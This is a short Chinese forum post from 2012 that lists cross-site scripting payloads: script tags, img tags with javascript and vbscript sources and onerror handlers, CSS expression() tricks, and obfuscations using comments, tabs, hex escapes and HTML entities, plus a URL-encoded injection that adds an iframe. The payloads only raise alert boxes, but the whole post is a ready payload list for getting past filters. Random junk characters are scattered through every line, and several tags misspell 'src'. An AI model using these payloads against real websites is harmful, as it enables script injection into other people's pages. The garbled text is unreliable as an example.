<script>alert("跨站")</script> (最常用)1 P7 y# L c4 y. e# a
<img scr=javascript:alert("跨站")></img># u5 w' d3 k+ K! A. M, W
<img scr="javascript: alert(/跨站/)></img>& n. d1 f) p2 s0 B6 ^
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)7 {/ i& P1 b$ R+ S
<img scr="#" onerror=alert(/跨站/)></img>
2 V( V- z+ z3 v. m<img scr="#" style="xss:expression(alert(/xss/));"></img>2 h! V; e( b( p3 E3 _
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)7 X# j" A P! H/ Y. Z' W
<img src=vbscript:msgbox ("xss")></img> U7 q S2 [# o- k
<style> input {left:expression (alert('xss'))}</style>
7 X( W; k$ ~4 v0 I \1 o; t e& z- u+ E<div style={left:expression (alert('xss'))}></div># Z: c) q3 Z; \
<div style={left:exp/* */ression (alert('xss'))}></div>
+ i/ p% E1 G8 e, ^' I1 |<div style={left:\0065\0078ression (alert('xss'))}></div>$ P7 M+ r( R. K1 c$ Q! F
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>& ]/ S- a: X: K. M. i
unicode <div style="{left:expRessioN (alert('xss'))}">
) n# y" i. m* _, j& q' N& o+ H/ y* b2 ]
. A1 k& y7 X; _3 @- N& _& q5 d"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["1 l* w$ E- I& q- ]4 w# j3 v
|
发表于 2012-9-15 14:09:13
收藏
支持
反对